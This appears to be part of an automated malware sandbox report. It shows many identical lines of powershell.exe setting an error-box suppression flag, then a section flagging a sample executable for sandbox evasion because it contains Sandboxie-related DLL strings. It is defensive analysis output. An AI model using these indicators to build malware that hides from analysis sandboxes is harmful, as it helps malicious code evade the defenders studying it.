Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: DIR_WATCH.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: SBIEDLL.DLL
